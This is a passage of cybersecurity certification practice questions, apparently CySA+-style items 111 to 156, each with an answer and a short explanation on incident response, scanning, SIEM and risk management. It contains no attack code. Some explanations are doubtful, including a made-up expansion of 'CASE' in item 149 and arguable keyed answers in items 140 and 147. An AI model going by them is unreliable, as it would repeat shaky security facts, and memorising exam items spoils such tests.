To ensure that users only use pre-approved web-based software, allowlisting should be deployed. Allowlisting (also known as whitelisting) involves specifying a list of approved applications or websites that users are allowed to access, while blocking all others. This approach enhances security by preventing unauthorized or unapproved software from being used within the organization.

111
Q

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

A. Shut down the server.
B. Reimage the server.
C. Quarantine the server.
D. Update the OS to latest version.

A

Correct Answer: C

When dealing with a ransomware incident, it’s crucial to respond promptly and effectively. Here are the recommended actions:

Isolate Impacted Systems: Determine which systems were affected and immediately isolate them. If possible, disconnect them from the network or take the network offline at the switch level. Prioritize isolating critical systems essential for daily operations.

Power Down Devices: If you can’t disconnect systems from the network, power them down to prevent further spread of the infection. Note that this step will prevent preserving ransomware artifacts in volatile memory.

Triage Impacted Systems: Identify critical systems for restoration on a clean network. Prioritize based on predefined critical asset lists, including systems critical for health, safety, revenue generation, or other essential services.

112
Q

An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?

A. Perform a tabletop drill based on previously identified incident scenarios.
B. Simulate an incident by shutting down power to the primary data center.
C. Migrate active workloads from the primary data center to the secondary location.
D. Compare the current plan to lessons learned from previous incidents.

A

Correct Answer: A

Performing a tabletop drill based on previously identified incident scenarios would be the best approach to test the changes without any impact to the business. In a tabletop drill, participants discuss and walk through hypothetical scenarios, identifying roles, responsibilities, and decision-making processes. It allows the incident response team to validate the updated plans and procedures without disrupting operations or systems. The other options (B, C, and D) involve more direct actions that could impact the business or require actual system changes.

113
Q

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

A. Deploy a database to aggregate the logging
B. Configure the servers to forward logs to a SIEM
C. Share the log directory on each server to allow local access.
D. Automate the emailing of logs to the analysts.

A

Correct Answer: B

B. Configure the servers to forward logs to a SIEM

Centralized Log Management (CLM) is essential for efficient monitoring and response in complex IT environments. Let’s break down the options:

  • Deploy a database to aggregate the logging (Option A): While this approach can centralize logs, it may not be the most efficient. Managing a database for log aggregation can be resource-intensive and complex.
  • Configure the servers to forward logs to a SIEM (Option B): This is the recommended choice. By forwarding logs to a Security Information and Event Management (SIEM) system, you achieve centralized visibility. SIEMs collect, correlate, and analyze logs from various sources, providing a unified view for security monitoring and incident detection.
  • Share the log directory on each server to allow local access (Option C): This approach doesn’t centralize logs; it merely provides local access. It’s not suitable for efficient analysis across the entire environment.
  • Automate the emailing of logs to the analysts (Option D): While automation is helpful, relying solely on email for log distribution isn’t ideal. It lacks scalability and real-time analysis capabilities.

In summary, configuring servers to forward logs to a SIEM (Option B) ensures central visibility, efficient analysis, and effective incident response12.

114
Q

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

A. Mean time to detect
B. Mean time to respond
C. Mean time to remediate
D. Service-level agreement uptime

A

Correct Answer: A

To improve visibility and reduce the time to prevent lateral movement and data exfiltration, the most relevant technique is Mean Time to Detect (MTTD). MTTD measures how quickly an organization identifies security incidents or threats. By minimizing MTTD, you can detect malicious actors earlier, allowing for faster response and containment. The other options—Mean Time to Respond (MTTR), Mean Time to Remediate (MTTR), and Service-level Agreement (SLA) uptime—are important but focus on different aspects of incident management and resolution. MTTD directly addresses the goal of improving visibility and timely detection.

115
Q

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scan
B. External scan
C. Differential scan
D. Network scan

A

Correct Answer: A

Credentialed Scan: In a credentialed scan, the scanning tool is granted appropriate credentials (username and password) to access the target systems. This level of access allows for a more comprehensive and accurate assessment of the systems. Credentialed scans can gather detailed information about the system’s configuration, software, and vulnerabilities that may not be accessible in an external scan.

116
Q

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

A. Wipe the computer and reinstall software
B. Shut down the email server and quarantine it from the network
C. Acquire a bit-level image of the affected workstation
D. Search for other mail users who have received the same file

A

Correct Answer: D

The analyst has already contained the original infected machine.
Next would be to identify the scope of the malware (how many users have been affected).
After the spread has been contained, the analyst can go back and acquire the bit level image for further forensics.

117
Q

After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?

A. Transfer
B. Accept
C. Mitigate
D. Avoid

A

Correct Answer: C

The company is exercising the “Mitigate” risk management principle. By implementing a patch management program, they are taking steps to reduce the impact of vulnerabilities and mitigate the associated risks.

118
Q

The security analyst received the monthly vulnerability report. The following findings were included in the report:

  • Five of the systems only required a reboot to finalize the patch application
  • Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

A. Compensating controls
B. Due diligence
C. Maintenance windows
D. Passive discovery

A

Correct Answer: A

Given the situation, the best approach to minimize the risk of the outdated servers being compromised is Compensating controls (Option A).

Compensating Controls:
- Compensating controls are security measures that are put in place to mitigate risks when primary controls (such as patching) cannot be implemented.
- In this case, since the outdated servers cannot be patched, compensating controls can be used to reduce the risk of compromise.
- Examples of compensating controls include network segmentation, access controls, intrusion detection systems, and additional monitoring.

Other Options:
- Due diligence (Option B) refers to thorough research and investigation. While it’s important, it doesn’t directly address the risk posed by the outdated servers.
- Maintenance windows (Option C) are typically used for planned maintenance activities, but they don’t specifically address the outdated servers.
- Passive discovery (Option D) involves monitoring network traffic without actively probing or scanning. While useful, it doesn’t directly address the risk of server compromise.

Therefore, Compensating controls would be the most effective approach in this scenario. It allows you to implement additional security measures to protect the outdated servers even when patching is not possible.

119
Q

A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?

A. Increasing training and awareness for all staff
B. Ensuring that malicious websites cannot be visited
C. Blocking all scripts downloaded from the internet
D. Disabling all staff members’ ability to run downloaded applications

A

Correct Answer: A

Increasing training and awareness for all staff (A): The root issue is human behavior—employees being susceptible to social engineering attacks. Training and awareness programs can educate staff on how to recognize and respond to such attempts, making this the most effective solution.

120
Q

An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?

A. Identify and discuss the lessons learned with the prior analyst.
B. Accept all findings and continue to investigate the next item target.
C. Review the steps that the previous analyst followed.
D. Validate the root cause from the prior analyst.

A

Correct Answer: C

During the transition between analysts, reviewing the steps that the previous analyst followed (Option C) is crucial. By understanding the investigation’s progress, you can build upon existing knowledge and avoid duplicating efforts. Additionally, this step ensures continuity and helps the new analyst identify any gaps or areas that need further exploration. Remember, effective communication with the prior analyst is essential for a smooth handover.

121
Q

An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?

A. False positive
B. True negative
C. False negative
D. True positive

A

Correct Answer: C

The SIEM rule indeed worked as expected by not triggering an alert at 9 failed login attempts. However, the issue lies in the threshold being set too high. Since the threshold was 10 failed logins within one minute, it failed to detect an actual attack when there were 9 failed logins. This situation is indeed a False Negative because the rule missed a legitimate security event.

122
Q

A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of following best fits the type of scanning activity requested?

A. Uncredentialed scan
B. Discovery scan
C. Vulnerability scan
D. Credentialed scan

A

Correct Answer: B

A discovery scan is typically used to identify the scope of a web application and understand where the scan will go. This type of scan is often the first step in assessing a web application’s security and helps the analyst determine which areas should be further examined or tested in-depth.

123
Q

Which of the following best describes the process of requiring remediation of a known threat within a given time frame?

A. SLA
B. MOU
C. Best-effort patching
D. Organizational governance

A

Correct Answer: A

The process of requiring remediation of a known threat within a given time frame is typically governed by an SLA (Service Level Agreement). An SLA defines the expected response time, resolution time, and other performance metrics for addressing security incidents or vulnerabilities. It ensures timely action to mitigate risks and maintain a strong cybersecurity posture.

124
Q

Which of the following risk management principles is accomplished by purchasing cyber insurance?

A. Accept
B. Avoid
C. Mitigate
D. Transfer

A

Correct Answer: D

Purchasing cyber insurance aligns with the risk management principle of transferring risk. By obtaining cyber insurance, organizations shift the financial burden of potential losses resulting from cyber incidents to the insurance provider. This allows them to mitigate the impact of breaches or data loss.

125
Q

A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?

A. Establish quarterly SDLC training on the top vulnerabilities for developers
B. Conduct a yearly inspection of the code repositories and provide the report to management.
C. Hire an external penetration test of the network
D. Deploy more vulnerability scanners for increased coverage

A

Correct Answer: A

To address the finding of increased awareness of secure coding practices, I recommend option A: Establish quarterly SDLC training on the top vulnerabilities for developers. This approach ensures that developers receive regular training and stay informed about the latest security threats and best practices. By integrating secure coding principles into their workflow, they can proactively prevent vulnerabilities in the code they write.

The other options (B, C, and D) are valuable but may not directly address the need for ongoing developer education.

126
Q

An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.)

A. Data classification
B. Data destruction
C. Data loss prevention
D. Encryption
E. Backups
F. Access controls

A

Correct Answer: D, F

Encryption (D): Relevant during data storage and usage phases. It ensures data confidentiality by converting it into a secure format that only authorized parties can decipher.

Access Controls (F): Crucial for data storage. Access controls limit who can access, modify, or delete data. Properly configured permissions prevent unauthorized access.

Data Life Cycle:
1. Create
2. Storage
3. Usage
4. Sharing
5. Archive
6 Destruction

Data Classification – Create (1)
Data Destruct – Destruction (6)
Data Loss Prevention – Usage (3), Share (4)
Encryption – Storage (2), Usage (3)
Backups – Archive (5)
Access Controls – Storage (2)

127
Q

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

A. OSSTMM
B. Diamond Model of Intrusion Analysis
C. OWASP
D. MITRE ATT&CK

A

Correct Answer: D

The company should align their security controls around D. MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge).

The MITRE ATT&CK framework is a powerful tool for Chief Information Security Officers (CISOs) to map all the attack vectors that the company faces each day.

It categorizes and details various adversary tactics and techniques based on real-world threat intelligence observations.

By revealing adversary tactics, techniques, and procedures (TTPs), MITRE ATT&CK empowers CISOs and their security teams to make informed, proactive decisions when addressing cyberthreats.

128
Q

An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?

A. The scanner is running without an agent installed.
B. The scanner is running in active mode.
C. The scanner is segmented improperly
D. The scanner is configured with a scanning window

A

Correct Answer: B

These scans can sometimes overload or disrupt target systems, especially if they are not configured or managed properly. In some cases, active scans can trigger vulnerabilities or cause service disruptions, leading to unexpected issues like a server crash.

129
Q

An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

A. Set user account control protection to the most restrictive level on all devices
B. Implement MFA requirements for all internal resources
C. Harden systems by disabling or removing unnecessary services
D. Implement controls to block execution of untrusted applications

A

Correct Answer: C

To reduce the rate of success of adversary privilege escalation attempts, the most effective control would be C. Harden systems by disabling or removing unnecessary services. By minimizing the attack surface and limiting the number of running services, you can significantly reduce the opportunities for adversaries to exploit vulnerabilities or escalate privileges.

While the other options (A, B, and D) are important security measures, they do not directly address the specific threat of privilege escalation via native Windows tools. Here’s a brief overview of each option:

  • A. Set user account control protection to the most restrictive level on all devices: This helps prevent unauthorized changes to system settings, but it doesn’t specifically target privilege escalation via native tools.
  • B. Implement MFA requirements for all internal resources: Multi-factor authentication (MFA) enhances security, but it primarily focuses on user authentication rather than system hardening.
  • D. Implement controls to block execution of untrusted applications: While this is a good practice, it doesn’t directly address the use of native Windows tools for privilege escalation.
130
Q

Which of the following actions would an analyst most likely perform after an incident has been investigated?

A. Risk assessment
B. Root cause analysis
C. Incident response plan
D. Tabletop exercise

A

Correct Answer: B

After an incident has been investigated, an analyst would most likely perform root cause analysis. This step involves identifying the underlying cause of the incident, understanding how it occurred, and determining preventive measures to avoid similar incidents in the future.

131
Q

After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?

A. Irregular peer-to-peer communication
B. Rogue device on the network
C. Abnormal OS process behavior
D. Data exfiltration

A

Correct Answer: D

Based on the information provided, the most likely scenario is D. Data exfiltration. The consistent outbound emails to a non-company address at a specific time could indicate an attempt to transfer sensitive data from the organization. It’s essential to investigate further to confirm this suspicion and take appropriate action to prevent any potential data breaches.

132
Q

A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?

A. Instruct the firewall engineer that a rule needs to be added to block this external server
B. Escalate the event to an incident and notify the SOC manager of the activity
C. Notify the incident response team that there is a DDoS attack occurring
D. Identify the IP/hostname for the requests and look at the related activity

A

Correct Answer: D

The next step for the SOC analyst would be to identify the IP/hostname for the requests and look at the related activity. This involves investigating the source of the HTTP/404 events to understand their origin and potential impact. By analyzing the IP addresses or hostnames associated with these events, the analyst can gain insights into whether this is a legitimate issue or a potential security threat. Once the source is identified, further actions can be taken as needed

133
Q

Which of the following best describes the reporting metric that should be utilized when measuring the degree to which a system application, or user base is affected by an uptime availability outage?

A. Timeline
B. Evidence
C. Impact
D. Scope

A

Correct Answer: C

The reporting metric that should be utilized when measuring the degree to which a system, application, or user base is affected by an uptime availability outage is “Impact”. This metric assesses the severity and consequences of the outage on the affected components, users, or services. By understanding the impact, organizations can prioritize recovery efforts and allocate resources effectively. Remember, impact measurement considers both the extent and severity of the disruption caused by the outage.

134
Q

A security analyst needs to provide evidence of regular vulnerability scanning on the company’s network for an auditing process. Which of the following is an example of a tool that can produce such evidence?

A. OpenVAS
B. Burp Suite
C. Nmap
D. Wireshark

A

Correct Answer: A

OpenVAS (Open Vulnerability Assessment Scanner)

When it comes to vulnerability scanning tools, OpenVAS is an excellent choice for producing evidence of regular vulnerability scans.

It’s an open-source solution that assesses computers, networks, or applications for vulnerabilities and security weaknesses. By systematically scanning for these weaknesses, OpenVAS helps organizations understand their exposure to potential security threats and provides a pathway to remediate identified issues, thereby enhancing the security posture.

135
Q

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?

A. Publicly disclose the request to other vendors
B. Notify the departments involved to preserve potentially relevant information
C. Establish a chain of custody starting with the attorney’s request
D. Back up the mailboxes on the server and provide the attorney with a copy

A

Correct Answer: B

Notifying the departments involved to preserve potentially relevant information is a crucial initial step.

By doing so, the organization ensures that relevant data is safeguarded before establishing a formal chain of custody.

Once the data is secured, the subsequent steps can focus on maintaining a clear and documented chain of custody in compliance with the legal hold request.

136
Q

Which of the following best describes the actions taken by an organization after the resolution of an incident that addresses issues and reflects on the growth opportunities for future incidents?

A. Lessons learned
B. Scrum review
C. Root cause analysis
D. Regulatory compliance

A

Correct Answer: A

After the resolution of an incident, the organization engages in a process known as “lessons learned.” This involves reflecting on the incident, identifying areas for improvement, and capturing insights to enhance future incident response. By analyzing what went well and what could be done better, the organization grows and strengthens its incident management practices.

137
Q

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A. Impact
B. Vulnerability score
C. Mean time to detect
D. Isolation

A

Correct Answer: A

To move the incident forward, the analyst should focus on the “Impact.”

Understanding the severity and consequences of the events is crucial for prioritizing investigations and allocating resources effectively.

By assessing impact, the analyst can address critical issues promptly and manage the workload more efficiently.

138
Q

To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured?

A. Preventive
B. Corrective
C. Directive
D. Detective

A

Correct Answer: D

The security control that the analyst has configured by adjusting audit settings in the organization’s cloud services is “Detective.” These settings allow the organization to monitor and identify potential security incidents by collecting relevant logs and data. By detecting anomalies or suspicious activities, the organization can respond promptly and mitigate risks.

139
Q

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?

A. MOU
B. NDA
C. BIA
D. SLA

A

Correct Answer: D

The contract that defines the various levels of maintenance to be provided by an external business vendor in a secure environment is known as a Service Level Agreement (SLA). An SLA outlines the specific services, performance expectations, and responsibilities between the organization and the vendor. It ensures clarity regarding maintenance, uptime, and support levels, helping establish a strong working relationship.

140
Q

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

A. Block the attacks using firewall rules
B. Deploy an IPS in the perimeter network
C. Roll out a CDN
D. Implement a load balancer

A

Correct Answer: B

Given the context of Layer 4 DDoS attacks, deploying an IPS (Option B) would be the most effective control. It can actively detect and block malicious traffic, providing better protection against such attacks:

A. Block the attacks using firewall rules (Option A): While firewalls can help filter traffic, they are not specifically designed to handle DDoS attacks efficiently. They might become overwhelmed during large-scale attacks.

B. Deploy an Intrusion Prevention System (IPS) in the perimeter network (Option B): An IPS can detect and block malicious traffic, including DDoS attacks. It’s a better choice than firewalls for this purpose.

C. Roll out a Content Delivery Network (CDN) (Option C): CDNs distribute content across multiple servers, reducing the impact of DDoS attacks by distributing the load. However, CDNs are more effective against Layer 7 attacks (application layer) rather than Layer 4 attacks.

D. Implement a load balancer (Option D): Load balancers distribute incoming traffic across multiple servers, preventing any single server from being overwhelmed. While they can help with DDoS attacks, they are more effective against Layer 7 attacks.

141
Q

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

A. DLP
B. NAC
C. EDR
D. NIDS

A

Correct Answer: C

The best tool to deploy for data collection and aggregation from various endpoints is Endpoint Detection and Response (EDR).

EDR tools provide real-time monitoring and collection of endpoint data, allowing analysts to rapidly detect, investigate, and remediate threats. They collect large amounts of data from endpoint devices and use various data analytics techniques to identify patterns that indicate a threat. This makes EDR tools highly effective for security data aggregation.

Therefore, the correct answer is C. EDR.

142
Q

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best reason for developing the organization’s communication plans?

A. For the organization’s public relations department to have a standard notification
B. To ensure incidents are immediately reported to a regulatory agency
C. To automate the notification to customers who were impacted by the breach
D. To have approval from executive leadership on when communication should occur

A

Correct Answer: D

In regulated organizations, compliance with regulatory requirements is indeed crucial. However, the need for executive leadership approval in communication plans stems from several factors:

Coordination and Consistency: Having executive approval ensures that communication is consistent across all channels (internal, external, and public relations). It prevents conflicting messages and ensures a unified approach.
Risk Assessment: Executive leadership considers the potential impact of the breach, legal implications, and reputational risks. Their approval ensures that communication aligns with the organization’s risk tolerance.
Timeliness: While regulatory agencies provide guidelines, the specific timing of communication may vary based on the incident’s severity. Executive leadership can assess the situation and decide when to notify affected parties.
Legal and Financial Implications: Executive approval ensures that legal and financial considerations are addressed. For instance, notifying customers promptly may mitigate legal liabilities.

In summary, while regulatory agencies set guidelines, executive leadership plays a critical role in determining the timing and approach of communication during security incidents.

143
Q

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?

A. MFA
B. User and password
C. PAM
D. Key pair

A

Correct Answer: D

For downloading the configuration of cloud assets, the security analyst should use key pair authentication (option D).

This method provides strong security by using public and private keys to authenticate and establish a secure connection. It’s commonly used for secure access to cloud resources.
- MFA (option A) is an additional layer of security but isn’t directly related to asset configuration downloads.
- User and password (option B) and PAM (option C) are less secure for this purpose.

144
Q

Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?

A. Turn on all systems, scan for infection, and back up data to a USB storage device.
B. Identify and remove the software installed on the impacted systems in the department.
C. Explain that malware cannot truly be removed and then reimage the devices.
D. Log on to the impacted systems with an administrator account that has privileges to perform backups.
E. Segment the entire department from the network and review each computer offline.

A

Correct Answer: E

Given the situation, the first step the incident response staff members should take when they arrive is E. Segment the entire department from the network and review each computer offline.

  1. Segmentation: Since the network is robustly segmented based on areas of responsibility, it’s crucial to isolate the affected department from the rest of the network. This prevents the malware from spreading further and affecting other systems.
  2. Offline Review: By reviewing each computer offline (i.e., without network connectivity), the incident response team can assess the extent of the infection, identify compromised systems, and determine the nature of the malware. They can also collect evidence for further analysis.

The other options have potential issues:
- A: Turning on all systems and scanning for infection could inadvertently spread the malware.
- B: Identifying and removing software might not be effective if the malware is deeply embedded.
- C: Reimaging devices without understanding the malware’s behavior may not prevent reinfection.
- D: Logging in with an administrator account could expose the incident response team to risks.

145
Q

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?

A. Employing Nmap Scripting Engine scanning techniques
B. Preserving the state of PLC ladder logic prior to scanning
C. Using passive instead of active vulnerability scans
D. Running scans during off-peak manufacturing hours

A

Correct Answer: C

To ensure the third-party consultant does no harm to operations while assessing the OT network, the following considerations should be taken into account:

Using passive instead of active vulnerability scans: Passive scans observe network traffic without actively probing or sending requests. This approach minimizes disruption to fragile and legacy equipment, reducing the risk of unintended consequences during the assessment.

Preserving the state of PLC ladder logic (Option B) is essential for maintaining operational stability, but it’s not directly related to the consultant’s scanning techniques. Similarly, running scans during off-peak hours (Option D) is a good practice, but it doesn’t specifically address the risk of harm. Employing Nmap Scripting Engine techniques (Option A) may be useful, but it’s not the primary consideration for avoiding harm to operations.

Therefore, the best choice is C. Using passive instead of active vulnerability scans. This approach allows assessment without disrupting critical systems.

146
Q

A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?

A. SIEM
B. SOAR
C. IPS
D. CERT

A

Correct Answer: A

The technology that best fits the description of correlating information from various sources, analyzing it, and triggering notifications based on company policy is Security Information and Event Management (SIEM).

SIEM systems collect and correlate data from network sensors, application logs, and host logs to detect security incidents and provide alerts. They play a crucial role in monitoring and managing security events within an organization.

  • A. SIEM is the correct answer.
  • B. SOAR (Security Orchestration, Automation, and Response) focuses on automating incident response processes but doesn’t necessarily correlate information from various sources.
  • C. IPS (Intrusion Prevention System) is designed to prevent and block malicious network traffic but doesn’t handle information correlation.
  • D. CERT (Computer Emergency Response Team) is an incident response team within an organization, not a technology for correlating information.
147
Q

Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?

A. Install a firewall.
B. Implement vulnerability management.
C. Deploy sandboxing.
D. Update the application blocklist.

A

Correct Answer: B

To mitigate the effects of a new ransomware attack that bypassed the company antivirus, implementing vulnerability management would be the most effective approach.

  • Firewall (Option A): Firewalls control network traffic based on predefined rules. While they are essential for network security, they primarily focus on filtering incoming and outgoing traffic. They won’t directly address an ongoing ransomware attack that has already infiltrated the network.
  • Vulnerability Management (Option B): This approach involves identifying and addressing vulnerabilities in software, systems, and applications. By regularly scanning for vulnerabilities, applying patches, and updating software, you can reduce the attack surface and prevent exploitation by ransomware.
  • Sandboxing (Option C): Sandboxing isolates suspicious files or processes in a controlled environment to analyze their behavior. While it’s useful for detecting malware, it’s not a direct mitigation strategy for an ongoing attack.
  • Application Blocklist (Option D): Maintaining an application blocklist helps prevent unauthorized or malicious software from running. However, it won’t stop an active ransomware attack that has already infiltrated the system.

In summary, vulnerability management is the most relevant and proactive measure to address an ongoing ransomware attack. It focuses on identifying and fixing vulnerabilities, reducing the risk of successful exploitation.

148
Q

A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?

A. Reverse engineering
B. Known environment testing
C. Dynamic application security testing
D. Code debugging

A

Correct Answer: C

For identifying vulnerabilities, including SQL injection, RFI, and XSS, the most suitable approach would be dynamic application security testing (DAST).

DAST involves scanning applications in their running state to identify security flaws and vulnerabilities. It checks for issues like input validation errors, insecure configurations, and common attack vectors. By actively probing the application, DAST helps discover vulnerabilities that could be exploited by attackers. Other options like reverse engineering, known environment testing, and code debugging are not specifically designed for vulnerability identification in the same way as DAST1. So, I recommend choosing option C: Dynamic application security testing.

149
Q

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASE to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

A. SIEM ingestion logs are reduced by 20%.
B. Phishing alerts drop by 20%.
C. False positive rates drop to 20%.
D. The MTTR decreases by 20%.

A

Correct Answer: C

The integration of Data Loss Prevention (DLP) and Cybersecurity Analytics and Security Event (CASE) tools aims to enhance security operations and reduce alert fatigue. Let’s break down the options:

A. SIEM ingestion logs are reduced by 20%: While this could be a positive outcome, it’s not directly related to reducing alert fatigue.

B. Phishing alerts drop by 20%: This is a specific improvement related to threat detection and could contribute to reducing alert fatigue. However, it’s not the best possible outcome.

C. False positive rates drop to 20%: This is a strong contender. Lowering false positives means analysts spend less time investigating non-threatening alerts, which directly addresses alert fatigue.

D. The MTTR (Mean Time to Respond) decreases by 20%: While reducing response time is valuable, it doesn’t directly address alert fatigue.

The most relevant outcome is C. False positive rates drop to 20%. By minimizing false positives, analysts can focus on genuine threats, leading to more efficient and effective incident response

150
Q

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

A. Hacktivist
B. Organized crime
C. Nation-state
D. Lone wolf

A

Correct Answer: A

The threat actor most likely to target a company due to its questionable environmental policies is A. Hacktivist.

Hacktivists are motivated by social or political causes and may engage in cyberattacks to promote their agenda or protest against specific policies or practices. In this case, environmental policies would be a relevant target for hacktivist activity.

151
Q

A cybersecurity analyst is recording the following details:

  • ID
  • Name
  • Description
  • Classification of information
  • Responsible party

In which of the following documents is the analyst recording this information?

A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan

A

Correct Answer: A

A risk register is a document used to record information about identified risks within an organization. It typically includes details such as the risk ID, risk name, description of the risk, classification of the risk (e.g., impact and likelihood), and the responsible party for managing or mitigating the risk. Recording this information in a risk register helps organizations systematically manage and prioritize risks to their assets and operations.

152
Q

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?

A. Trends
B. Risk score
C. Mitigation
D. Prioritization

A

Correct Answer: B

The best solution to identify potential loss incurred by an issue in a reporting process for vulnerability management would be Risk score.

A risk score helps quantify the impact and likelihood of a vulnerability, allowing the SOC manager to prioritize remediation efforts effectively.

153
Q

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?

A. If appropriate logging levels are set
B. NTP configuration on each system
C. Behavioral correlation settings
D. Data normalization rules

A

Correct Answer: D

In the context of a SIEM setup, data normalization rules are crucial for standardizing and correlating data from various sources.

These rules allow the SIEM to accurately identify patterns and anomalies across different systems. So, while NTP configuration is essential, addressing data normalization rules should be the initial step for effective incident correlation

154
Q

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?

A. The risk would not change because network firewalls are in use
B. The risk would decrease because RDP is blocked by the firewall
C. The risk would decrease because a web application firewall is in place
D. The risk would increase because the host is external facing

A

Correct Answer: D

Considering the context, Option D is the most appropriate choice. The risk would increase because the host is externally facing, and the vulnerability over port 3389 poses a significant threat.

A. The risk would not change because network firewalls are in use:
This option doesn’t directly address the vulnerability identified over port 3389.
Network firewalls may not specifically mitigate the vulnerability associated with port 3389.

B. The risk would decrease because RDP is blocked by the firewall:
This option suggests that blocking Remote Desktop Protocol (RDP) would reduce the risk.
However, the vulnerability was identified over port 3389, which is commonly used for RDP.
Blocking RDP might mitigate the specific vulnerability but doesn’t necessarily address other potential risks.

C. The risk would decrease because a web application firewall is in place:
A web application firewall (WAF) is designed to protect web applications from attacks.
While it’s beneficial for web-related vulnerabilities, it may not directly address vulnerabilities over port 3389.
Therefore, this option is less likely to significantly reduce the overall risk associated with the vulnerability.

D. The risk would increase because the host is external facing:
This option acknowledges that the web server is externally accessible.
External-facing servers are more exposed to threats, increasing the overall risk.
The vulnerability identified over port 3389 adds to this risk.

Therefore, this option aligns with the potential impact of the vulnerability.

155
Q

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.)

A. Performing dynamic application security testing
B. Reviewing the code
C. Fuzzing the application
D. Debugging the code
E. Implementing a coding standard
F. Implementing IDS

A

Correct Answer: B, D

Reviewing the Code (Option B):
- Developers should carefully examine the code to identify any logical or syntactical errors. This involves analyzing the code line by line, checking for inconsistencies, missing semicolons, incorrect variable assignments, and other issues.
- By reviewing the code thoroughly, developers can catch errors early in the development process and ensure that the code adheres to best practices.

Debugging the Code (Option D):
- Debugging involves identifying and fixing errors in the code. Developers use debugging tools (such as breakpoints, logging, or step-by-step execution) to trace the flow of the program and pinpoint the exact location of errors.
- Debugging helps identify issues related to incorrect data, unexpected behavior, or exceptions during runtime.
Common debugging techniques include using print statements, analyzing stack traces, and using integrated development environments (IDEs) with debugging features.

While other options (such as dynamic application security testing, fuzzing, implementing a coding standard, and implementing intrusion detection systems) are valuable for security and quality assurance, they do not directly address runtime errors in the code. Therefore, options B (Reviewing the code) and D (Debugging the code) are the most relevant for resolving this issue.

156
Q

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?

A. System hardening
B. Hybrid network architecture
C. Continuous authorization
D. Secure access service edge

A

Correct Answer: A

